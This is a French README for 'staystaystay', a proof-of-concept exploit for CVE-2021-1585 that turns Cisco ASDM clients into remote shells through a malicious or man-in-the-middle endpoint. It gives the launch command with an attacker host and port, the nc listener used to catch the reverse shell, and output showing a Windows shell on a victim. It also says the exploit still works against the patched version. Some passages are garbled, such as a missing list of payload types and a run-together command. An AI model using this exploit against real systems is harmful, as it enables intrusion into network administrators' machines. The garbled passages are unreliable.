
Preuve de concept pour CVE-2021-1585 : Cisco ASA Device Manager RCE
staystaystay est un exploit de preuve de concept pour CVE-2021-1585, un problème de RCE (exécution de code à distance) de type homme du milieu ou point de terminaison malveillant affectant Cisco ASA Device Manager (ASDM). Ce problème a été découvert à l'origine par Malcolm Lashley et divulgué à l'été 2021. Cependant, au moment où je m'y intéressais, il n'était pas corrigé dans la dernière version (ASDM 7.17(1)), et je suis tombé dessus indépendamment.
Cisco a « corrigé » ce problème dans ASDM 7.18(1.152). Je dis « corrigé » parce que cet exploit fonctionne encore très bien. L'utilisateur devra simplement cliquer sur « Oui ». Voir une vidéo ci-dessous.
Les attaquants peuvent configurer deux types de payloads pour obtenir un reverse shell sur la victime :
Si une victime connecte son ASDM à staystaystay, celui-ci injectera le payload configuré, ce qui permettra d'obtenir un reverse shell. Le reverse shell jjs peut être capturé avec un écouteur nc classique (ou même Metasploit, si vous le souhaitez). L'option Longtime Sunshine nécessite que l'attaquant utilise ce framework.
Par exemple, la commande suivante démarre staystaystay sur le port 8443 avec le payload :
jjs./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
Une fois que la victime se connecte au port 8443, un reverse shell sera généré vers 10.0.0.2:1270 :
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
La vidéo suivante contient un exemple d'exploitation avec Longtime Sunshine :
La vidéo suivante démontre l'attaque contre une version corrigée :
Une analyse AttackerKB est disponible ici :